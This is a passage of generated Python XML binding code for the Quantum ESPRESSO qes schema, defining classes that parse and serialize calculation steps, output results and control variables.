    def __init__(self, n_step=None, scf_conv=None, atomic_structure=None, total_energy=None, forces=None, stress=None, FCP_force=None, FCP_tot_charge=None):
        self.original_tagname_ = None
        self.n_step = _cast(int, n_step)
        self.scf_conv = scf_conv
        self.atomic_structure = atomic_structure
        self.total_energy = total_energy
        self.forces = forces
        self.stress = stress
        self.FCP_force = FCP_force
        self.FCP_tot_charge = FCP_tot_charge
    def factory(*args_, **kwargs_):
        """Create an instance, honouring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, stepType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        cls = stepType.subclass or stepType
        return cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_scf_conv(self): return self.scf_conv
    def set_scf_conv(self, scf_conv): self.scf_conv = scf_conv
    def get_atomic_structure(self): return self.atomic_structure
    def set_atomic_structure(self, atomic_structure): self.atomic_structure = atomic_structure
    def get_total_energy(self): return self.total_energy
    def set_total_energy(self, total_energy): self.total_energy = total_energy
    def get_forces(self): return self.forces
    def set_forces(self, forces): self.forces = forces
    def get_stress(self): return self.stress
    def set_stress(self, stress): self.stress = stress
    def get_FCP_force(self): return self.FCP_force
    def set_FCP_force(self, FCP_force): self.FCP_force = FCP_force
    def get_FCP_tot_charge(self): return self.FCP_tot_charge
    def set_FCP_tot_charge(self, FCP_tot_charge): self.FCP_tot_charge = FCP_tot_charge
    def get_n_step(self): return self.n_step
    def set_n_step(self, n_step): self.n_step = n_step
    def hasContent_(self):
        """True when at least one child element is set (``n_step`` is an
        attribute and does not count)."""
        return any(getattr(self, tag) is not None for tag in (
            'scf_conv', 'atomic_structure', 'total_energy',
            'forces', 'stress', 'FCP_force', 'FCP_tot_charge'))
    def export(self, outfile, level, namespaceprefix_='qes:', name_='stepType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element (tag, attributes, children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('stepType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='stepType')
        if not self.hasContent_():
            # No children: close as an empty-element tag.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='stepType', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='stepType'):
        """Write the ``n_step`` attribute when present."""
        if self.n_step is not None and 'n_step' not in already_processed:
            already_processed.add('n_step')
            outfile.write(' n_step="%s"' % self.gds_format_integer(self.n_step, input_name='n_step'))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='stepType', fromsubclass_=False, pretty_print=True):
        """Serialize child elements in schema order."""
        eol_ = '\n' if pretty_print else ''
        # Complex children delegate to their own export().
        for tag in ('scf_conv', 'atomic_structure', 'total_energy', 'forces', 'stress'):
            child = getattr(self, tag)
            if child is not None:
                child.export(outfile, level, namespaceprefix_, name_=tag, pretty_print=pretty_print)
        # Simple double-valued children are written inline.
        for tag in ('FCP_force', 'FCP_tot_charge'):
            value = getattr(self, tag)
            if value is not None:
                showIndent(outfile, level, pretty_print)
                outfile.write('<qes:%s>%s</qes:%s>%s' % (tag, self.gds_format_double(value, input_name=tag), tag, eol_))
    def build(self, node):
        """Populate this instance from an ElementTree *node*; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            tag = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, tag)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse the ``n_step`` attribute (must be a positive integer)."""
        value = find_attr_value_('n_step', node)
        if value is None or 'n_step' in already_processed:
            return
        already_processed.add('n_step')
        try:
            self.n_step = int(value)
        except ValueError as exp:
            raise_parse_error(node, 'Bad integer attribute: %s' % exp)
        if self.n_step <= 0:
            raise_parse_error(node, 'Invalid PositiveInteger')
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Deserialize one child element into the matching attribute."""
        simple = {
            'scf_conv': scf_convType,
            'atomic_structure': atomic_structureType,
            'total_energy': total_energyType,
        }
        if nodeName_ in simple:
            obj_ = simple[nodeName_].factory()
            obj_.build(child_)
            setattr(self, nodeName_, obj_)
            obj_.original_tagname_ = nodeName_
        elif nodeName_ in ('forces', 'stress'):
            # matrixType children may carry an xsi:type override, so the
            # concrete class is resolved from the node itself.
            obj_ = self.get_class_obj_(child_, matrixType).factory()
            obj_.build(child_)
            setattr(self, nodeName_, obj_)
            obj_.original_tagname_ = nodeName_
        elif nodeName_ in ('FCP_force', 'FCP_tot_charge') and child_.text:
            try:
                fval_ = float(child_.text)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            setattr(self, nodeName_, self.gds_validate_float(fval_, node, nodeName_))
# end class stepType
class outputType(GeneratedsSuper):
    """Generated binding for the qes ``output`` element.

    Aggregates the results of a completed calculation: convergence and
    algorithmic info, atomic species and structure, symmetries, basis
    set, DFT settings, boundary conditions, magnetization, total energy,
    band structure, forces, stress, electric field, and FCP quantities.
    All child elements are optional (``None`` means absent).
    """
    subclass = None
    superclass = None
    def __init__(self, convergence_info=None, algorithmic_info=None, atomic_species=None, atomic_structure=None, symmetries=None, basis_set=None, dft=None, boundary_conditions=None, magnetization=None, total_energy=None, band_structure=None, forces=None, stress=None, electric_field=None, FCP_force=None, FCP_tot_charge=None):
        self.original_tagname_ = None
        self.convergence_info = convergence_info
        self.algorithmic_info = algorithmic_info
        self.atomic_species = atomic_species
        self.atomic_structure = atomic_structure
        self.symmetries = symmetries
        self.basis_set = basis_set
        self.dft = dft
        self.boundary_conditions = boundary_conditions
        self.magnetization = magnetization
        self.total_energy = total_energy
        self.band_structure = band_structure
        self.forces = forces
        self.stress = stress
        self.electric_field = electric_field
        self.FCP_force = FCP_force
        self.FCP_tot_charge = FCP_tot_charge
    def factory(*args_, **kwargs_):
        """Create an instance, honouring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, outputType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if outputType.subclass:
            return outputType.subclass(*args_, **kwargs_)
        else:
            return outputType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated getter/setter pairs, one per child element.
    def get_convergence_info(self): return self.convergence_info
    def set_convergence_info(self, convergence_info): self.convergence_info = convergence_info
    def get_algorithmic_info(self): return self.algorithmic_info
    def set_algorithmic_info(self, algorithmic_info): self.algorithmic_info = algorithmic_info
    def get_atomic_species(self): return self.atomic_species
    def set_atomic_species(self, atomic_species): self.atomic_species = atomic_species
    def get_atomic_structure(self): return self.atomic_structure
    def set_atomic_structure(self, atomic_structure): self.atomic_structure = atomic_structure
    def get_symmetries(self): return self.symmetries
    def set_symmetries(self, symmetries): self.symmetries = symmetries
    def get_basis_set(self): return self.basis_set
    def set_basis_set(self, basis_set): self.basis_set = basis_set
    def get_dft(self): return self.dft
    def set_dft(self, dft): self.dft = dft
    def get_boundary_conditions(self): return self.boundary_conditions
    def set_boundary_conditions(self, boundary_conditions): self.boundary_conditions = boundary_conditions
    def get_magnetization(self): return self.magnetization
    def set_magnetization(self, magnetization): self.magnetization = magnetization
    def get_total_energy(self): return self.total_energy
    def set_total_energy(self, total_energy): self.total_energy = total_energy
    def get_band_structure(self): return self.band_structure
    def set_band_structure(self, band_structure): self.band_structure = band_structure
    def get_forces(self): return self.forces
    def set_forces(self, forces): self.forces = forces
    def get_stress(self): return self.stress
    def set_stress(self, stress): self.stress = stress
    def get_electric_field(self): return self.electric_field
    def set_electric_field(self, electric_field): self.electric_field = electric_field
    def get_FCP_force(self): return self.FCP_force
    def set_FCP_force(self, FCP_force): self.FCP_force = FCP_force
    def get_FCP_tot_charge(self): return self.FCP_tot_charge
    def set_FCP_tot_charge(self, FCP_tot_charge): self.FCP_tot_charge = FCP_tot_charge
    def hasContent_(self):
        """Return True when at least one child element is set."""
        if (
            self.convergence_info is not None or
            self.algorithmic_info is not None or
            self.atomic_species is not None or
            self.atomic_structure is not None or
            self.symmetries is not None or
            self.basis_set is not None or
            self.dft is not None or
            self.boundary_conditions is not None or
            self.magnetization is not None or
            self.total_energy is not None or
            self.band_structure is not None or
            self.forces is not None or
            self.stress is not None or
            self.electric_field is not None or
            self.FCP_force is not None or
            self.FCP_tot_charge is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='outputType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element and its children as XML to *outfile*.

        *level* is the indentation depth; a registered namespace override
        for 'outputType' takes precedence over *namespacedef_*.
        """
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('outputType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='outputType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='outputType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='outputType'):
        """This element carries no XML attributes; nothing to write."""
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='outputType', fromsubclass_=False, pretty_print=True):
        """Write each non-None child element, in schema order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.convergence_info is not None:
            self.convergence_info.export(outfile, level, namespaceprefix_, name_='convergence_info', pretty_print=pretty_print)
        if self.algorithmic_info is not None:
            self.algorithmic_info.export(outfile, level, namespaceprefix_, name_='algorithmic_info', pretty_print=pretty_print)
        if self.atomic_species is not None:
            self.atomic_species.export(outfile, level, namespaceprefix_, name_='atomic_species', pretty_print=pretty_print)
        if self.atomic_structure is not None:
            self.atomic_structure.export(outfile, level, namespaceprefix_, name_='atomic_structure', pretty_print=pretty_print)
        if self.symmetries is not None:
            self.symmetries.export(outfile, level, namespaceprefix_, name_='symmetries', pretty_print=pretty_print)
        if self.basis_set is not None:
            self.basis_set.export(outfile, level, namespaceprefix_, name_='basis_set', pretty_print=pretty_print)
        if self.dft is not None:
            self.dft.export(outfile, level, namespaceprefix_, name_='dft', pretty_print=pretty_print)
        if self.boundary_conditions is not None:
            self.boundary_conditions.export(outfile, level, namespaceprefix_, name_='boundary_conditions', pretty_print=pretty_print)
        if self.magnetization is not None:
            self.magnetization.export(outfile, level, namespaceprefix_, name_='magnetization', pretty_print=pretty_print)
        if self.total_energy is not None:
            self.total_energy.export(outfile, level, namespaceprefix_, name_='total_energy', pretty_print=pretty_print)
        if self.band_structure is not None:
            self.band_structure.export(outfile, level, namespaceprefix_, name_='band_structure', pretty_print=pretty_print)
        if self.forces is not None:
            self.forces.export(outfile, level, namespaceprefix_, name_='forces', pretty_print=pretty_print)
        if self.stress is not None:
            self.stress.export(outfile, level, namespaceprefix_, name_='stress', pretty_print=pretty_print)
        if self.electric_field is not None:
            self.electric_field.export(outfile, level, namespaceprefix_, name_='electric_field', pretty_print=pretty_print)
        if self.FCP_force is not None:
            # Scalar leaves are written inline rather than via .export().
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:FCP_force>%s</qes:FCP_force>%s' % (self.gds_format_double(self.FCP_force, input_name='FCP_force'), eol_))
        if self.FCP_tot_charge is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:FCP_tot_charge>%s</qes:FCP_tot_charge>%s' % (self.gds_format_double(self.FCP_tot_charge, input_name='FCP_tot_charge'), eol_))
    def build(self, node):
        """Populate this instance from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """This element carries no XML attributes; nothing to parse."""
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch one parsed child element onto the matching attribute.

        Unrecognized tag names are silently ignored.
        """
        if nodeName_ == 'convergence_info':
            obj_ = convergence_infoType.factory()
            obj_.build(child_)
            self.convergence_info = obj_
            obj_.original_tagname_ = 'convergence_info'
        elif nodeName_ == 'algorithmic_info':
            obj_ = algorithmic_infoType.factory()
            obj_.build(child_)
            self.algorithmic_info = obj_
            obj_.original_tagname_ = 'algorithmic_info'
        elif nodeName_ == 'atomic_species':
            obj_ = atomic_speciesType.factory()
            obj_.build(child_)
            self.atomic_species = obj_
            obj_.original_tagname_ = 'atomic_species'
        elif nodeName_ == 'atomic_structure':
            obj_ = atomic_structureType.factory()
            obj_.build(child_)
            self.atomic_structure = obj_
            obj_.original_tagname_ = 'atomic_structure'
        elif nodeName_ == 'symmetries':
            obj_ = symmetriesType.factory()
            obj_.build(child_)
            self.symmetries = obj_
            obj_.original_tagname_ = 'symmetries'
        elif nodeName_ == 'basis_set':
            obj_ = basis_setType.factory()
            obj_.build(child_)
            self.basis_set = obj_
            obj_.original_tagname_ = 'basis_set'
        elif nodeName_ == 'dft':
            obj_ = dftType.factory()
            obj_.build(child_)
            self.dft = obj_
            obj_.original_tagname_ = 'dft'
        elif nodeName_ == 'boundary_conditions':
            obj_ = outputPBCType.factory()
            obj_.build(child_)
            self.boundary_conditions = obj_
            obj_.original_tagname_ = 'boundary_conditions'
        elif nodeName_ == 'magnetization':
            obj_ = magnetizationType.factory()
            obj_.build(child_)
            self.magnetization = obj_
            obj_.original_tagname_ = 'magnetization'
        elif nodeName_ == 'total_energy':
            obj_ = total_energyType.factory()
            obj_.build(child_)
            self.total_energy = obj_
            obj_.original_tagname_ = 'total_energy'
        elif nodeName_ == 'band_structure':
            obj_ = band_structureType.factory()
            obj_.build(child_)
            self.band_structure = obj_
            obj_.original_tagname_ = 'band_structure'
        elif nodeName_ == 'forces':
            # 'forces' may be encoded as a subclass of matrixType; resolve
            # the concrete class from the element before instantiating.
            class_obj_ = self.get_class_obj_(child_, matrixType)
            obj_ = class_obj_.factory()
            obj_.build(child_)
            self.forces = obj_
            obj_.original_tagname_ = 'forces'
        elif nodeName_ == 'stress':
            class_obj_ = self.get_class_obj_(child_, matrixType)
            obj_ = class_obj_.factory()
            obj_.build(child_)
            self.stress = obj_
            obj_.original_tagname_ = 'stress'
        elif nodeName_ == 'electric_field':
            obj_ = outputElectricFieldType.factory()
            obj_.build(child_)
            self.electric_field = obj_
            obj_.original_tagname_ = 'electric_field'
        elif nodeName_ == 'FCP_force' and child_.text:
            # Scalar leaf element: parse its text content as a float.
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'FCP_force')
            self.FCP_force = fval_
        elif nodeName_ == 'FCP_tot_charge' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'FCP_tot_charge')
            self.FCP_tot_charge = fval_
# end class outputType
class control_variablesType(GeneratedsSuper):
    """Generated binding for the qes ``control_variables`` element.

    Holds run-control settings for a calculation: calculation type,
    restart mode, I/O locations (prefix, pseudo_dir, outdir), what to
    compute (stress, forces), wavefunction collection, verbosity, step
    limits and convergence thresholds.  Several fields have non-None
    defaults taken from the schema (e.g. calculation='scf',
    etot_conv_thr=1.0e-5); ``hasContent_`` compares against those
    defaults, not just against None.
    """
    subclass = None
    superclass = None
    def __init__(self, title=None, calculation='scf', restart_mode='from_scratch', prefix=None, pseudo_dir=None, outdir=None, stress=None, forces=None, wf_collect=False, disk_io='low', max_seconds=None, nstep=None, etot_conv_thr=1.0e-5, forc_conv_thr=1.0e-3, press_conv_thr=5e-1, verbosity='low', print_every=None):
        self.original_tagname_ = None
        self.title = title
        self.calculation = calculation
        self.validate_calculationType(self.calculation)
        self.restart_mode = restart_mode
        self.validate_controlRestartModeType(self.restart_mode)
        self.prefix = prefix
        self.pseudo_dir = pseudo_dir
        self.outdir = outdir
        self.stress = stress
        self.forces = forces
        self.wf_collect = wf_collect
        self.disk_io = disk_io
        self.validate_lowhighType(self.disk_io)
        self.max_seconds = max_seconds
        self.nstep = nstep
        self.etot_conv_thr = etot_conv_thr
        self.forc_conv_thr = forc_conv_thr
        self.press_conv_thr = press_conv_thr
        self.verbosity = verbosity
        self.validate_lowhighType(self.verbosity)
        self.print_every = print_every
    def factory(*args_, **kwargs_):
        """Create an instance, honouring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, control_variablesType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if control_variablesType.subclass:
            return control_variablesType.subclass(*args_, **kwargs_)
        else:
            return control_variablesType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated getter/setter pairs, one per child element.
    def get_title(self): return self.title
    def set_title(self, title): self.title = title
    def get_calculation(self): return self.calculation
    def set_calculation(self, calculation): self.calculation = calculation
    def get_restart_mode(self): return self.restart_mode
    def set_restart_mode(self, restart_mode): self.restart_mode = restart_mode
    def get_prefix(self): return self.prefix
    def set_prefix(self, prefix): self.prefix = prefix
    def get_pseudo_dir(self): return self.pseudo_dir
    def set_pseudo_dir(self, pseudo_dir): self.pseudo_dir = pseudo_dir
    def get_outdir(self): return self.outdir
    def set_outdir(self, outdir): self.outdir = outdir
    def get_stress(self): return self.stress
    def set_stress(self, stress): self.stress = stress
    def get_forces(self): return self.forces
    def set_forces(self, forces): self.forces = forces
    def get_wf_collect(self): return self.wf_collect
    def set_wf_collect(self, wf_collect): self.wf_collect = wf_collect
    def get_disk_io(self): return self.disk_io
    def set_disk_io(self, disk_io): self.disk_io = disk_io
    def get_max_seconds(self): return self.max_seconds
    def set_max_seconds(self, max_seconds): self.max_seconds = max_seconds
    def get_nstep(self): return self.nstep
    def set_nstep(self, nstep): self.nstep = nstep
    def get_etot_conv_thr(self): return self.etot_conv_thr
    def set_etot_conv_thr(self, etot_conv_thr): self.etot_conv_thr = etot_conv_thr
    def get_forc_conv_thr(self): return self.forc_conv_thr
    def set_forc_conv_thr(self, forc_conv_thr): self.forc_conv_thr = forc_conv_thr
    def get_press_conv_thr(self): return self.press_conv_thr
    def set_press_conv_thr(self, press_conv_thr): self.press_conv_thr = press_conv_thr
    def get_verbosity(self): return self.verbosity
    def set_verbosity(self, verbosity): self.verbosity = verbosity
    def get_print_every(self): return self.print_every
    def set_print_every(self, print_every): self.print_every = print_every
    def validate_calculationType(self, value):
        """Warn (not raise) when *value* is not a valid calculationType."""
        # Validate type calculationType, a restriction on string.
        if value is not None and Validate_simpletypes_:
            value = str(value)
            enumerations = ['scf', 'nscf', 'bands', 'relax', 'vc-relax', 'md', 'vc-md']
            enumeration_respectee = False
            for enum in enumerations:
                if value == enum:
                    enumeration_respectee = True
                    break
            if not enumeration_respectee:
                warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on calculationType' % {"value" : value.encode("utf-8")} )
    def validate_controlRestartModeType(self, value):
        """Warn (not raise) when *value* is not a valid restart mode."""
        # Validate type controlRestartModeType, a restriction on string.
        if value is not None and Validate_simpletypes_:
            value = str(value)
            enumerations = ['from_scratch', 'restart']
            enumeration_respectee = False
            for enum in enumerations:
                if value == enum:
                    enumeration_respectee = True
                    break
            if not enumeration_respectee:
                warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on controlRestartModeType' % {"value" : value.encode("utf-8")} )
    def validate_lowhighType(self, value):
        """Warn (not raise) when *value* is neither 'low' nor 'high'."""
        # Validate type lowhighType, a restriction on string.
        if value is not None and Validate_simpletypes_:
            value = str(value)
            enumerations = ['low', 'high']
            enumeration_respectee = False
            for enum in enumerations:
                if value == enum:
                    enumeration_respectee = True
                    break
            if not enumeration_respectee:
                warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on lowhighType' % {"value" : value.encode("utf-8")} )
    def hasContent_(self):
        """Return True when any field differs from its schema default."""
        if (
            self.title is not None or
            self.calculation != "scf" or
            self.restart_mode != "from_scratch" or
            self.prefix is not None or
            self.pseudo_dir is not None or
            self.outdir is not None or
            self.stress is not None or
            self.forces is not None or
            self.wf_collect or
            self.disk_io != "low" or
            self.max_seconds is not None or
            self.nstep is not None or
            self.etot_conv_thr != 1.0e-5 or
            self.forc_conv_thr != 1.0e-3 or
            self.press_conv_thr != 5e-1 or
            self.verbosity != "low" or
            self.print_every is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='control_variablesType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element and its children as XML to *outfile*.

        *level* is the indentation depth; a registered namespace override
        for 'control_variablesType' takes precedence over *namespacedef_*.
        """
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('control_variablesType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='control_variablesType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='control_variablesType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # All defaults: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='control_variablesType'):
        """This element carries no XML attributes; nothing to write."""
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='control_variablesType', fromsubclass_=False, pretty_print=True):
        """Write each non-None field as a simple child element, in schema order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.title is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:title>%s</qes:title>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.title), input_name='title')), eol_))
        if self.calculation is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:calculation>%s</qes:calculation>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.calculation), input_name='calculation')), eol_))
        if self.restart_mode is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:restart_mode>%s</qes:restart_mode>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.restart_mode), input_name='restart_mode')), eol_))
        if self.prefix is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:prefix>%s</qes:prefix>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.prefix), input_name='prefix')), eol_))
        if self.pseudo_dir is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:pseudo_dir>%s</qes:pseudo_dir>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.pseudo_dir), input_name='pseudo_dir')), eol_))
        if self.outdir is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:outdir>%s</qes:outdir>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.outdir), input_name='outdir')), eol_))
        if self.stress is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:stress>%s</qes:stress>%s' % (self.gds_format_boolean(self.stress, input_name='stress'), eol_))
        if self.forces is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:forces>%s</qes:forces>%s' % (self.gds_format_boolean(self.forces, input_name='forces'), eol_))
        if self.wf_collect is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:wf_collect>%s</qes:wf_collect>%s' % (self.gds_format_boolean(self.wf_collect, input_name='wf_collect'), eol_))
        if self.disk_io is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:disk_io>%s</qes:disk_io>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.disk_io), input_name='disk_io')), eol_))
        if self.max_seconds is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:max_seconds>%s</qes:max_seconds>%s' % (self.gds_format_integer(self.max_seconds, input_name='max_seconds'), eol_))
        if self.nstep is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:nstep>%s</qes:nstep>%s' % (self.gds_format_integer(self.nstep, input_name='nstep'), eol_))
        if self.etot_conv_thr is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:etot_conv_thr>%s</qes:etot_conv_thr>%s' % (self.gds_format_double(self.etot_conv_thr, input_name='etot_conv_thr'), eol_))
        if self.forc_conv_thr is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:forc_conv_thr>%s</qes:forc_conv_thr>%s' % (self.gds_format_double(self.forc_conv_thr, input_name='forc_conv_thr'), eol_))
        if self.press_conv_thr is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:press_conv_thr>%s</qes:press_conv_thr>%s' % (self.gds_format_double(self.press_conv_thr, input_name='press_conv_thr'), eol_))
        if self.verbosity is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:verbosity>%s</qes:verbosity>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.verbosity), input_name='verbosity')), eol_))
        if self.print_every is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:print_every>%s</qes:print_every>%s' % (self.gds_format_integer(self.print_every, input_name='print_every'), eol_))
    def build(self, node):
        """Populate this instance from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """This element carries no XML attributes; nothing to parse."""
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element's text into the matching typed field.

        Strings are validated against their enumerations (warning only);
        booleans accept 'true'/'1'/'false'/'0'; integer fields must be
        strictly positive.  Unrecognized tag names are silently ignored.
        """
        if nodeName_ == 'title':
            title_ = child_.text
            title_ = self.gds_validate_string(title_, node, 'title')
            self.title = title_
        elif nodeName_ == 'calculation':
            calculation_ = child_.text
            calculation_ = self.gds_validate_string(calculation_, node, 'calculation')
            self.calculation = calculation_
            # validate type calculationType
            self.validate_calculationType(self.calculation)
        elif nodeName_ == 'restart_mode':
            restart_mode_ = child_.text
            restart_mode_ = self.gds_validate_string(restart_mode_, node, 'restart_mode')
            self.restart_mode = restart_mode_
            # validate type controlRestartModeType
            self.validate_controlRestartModeType(self.restart_mode)
        elif nodeName_ == 'prefix':
            prefix_ = child_.text
            prefix_ = self.gds_validate_string(prefix_, node, 'prefix')
            self.prefix = prefix_
        elif nodeName_ == 'pseudo_dir':
            pseudo_dir_ = child_.text
            pseudo_dir_ = self.gds_validate_string(pseudo_dir_, node, 'pseudo_dir')
            self.pseudo_dir = pseudo_dir_
        elif nodeName_ == 'outdir':
            outdir_ = child_.text
            outdir_ = self.gds_validate_string(outdir_, node, 'outdir')
            self.outdir = outdir_
        elif nodeName_ == 'stress':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'stress')
            self.stress = ival_
        elif nodeName_ == 'forces':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'forces')
            self.forces = ival_
        elif nodeName_ == 'wf_collect':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'wf_collect')
            self.wf_collect = ival_
        elif nodeName_ == 'disk_io':
            disk_io_ = child_.text
            disk_io_ = self.gds_validate_string(disk_io_, node, 'disk_io')
            self.disk_io = disk_io_
            # validate type lowhighType
            self.validate_lowhighType(self.disk_io)
        elif nodeName_ == 'max_seconds' and child_.text:
            sval_ = child_.text
            try:
                ival_ = int(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires integer: %s' % exp)
            if ival_ <= 0:
                raise_parse_error(child_, 'requires positiveInteger')
            ival_ = self.gds_validate_integer(ival_, node, 'max_seconds')
            self.max_seconds = ival_
        elif nodeName_ == 'nstep' and child_.text:
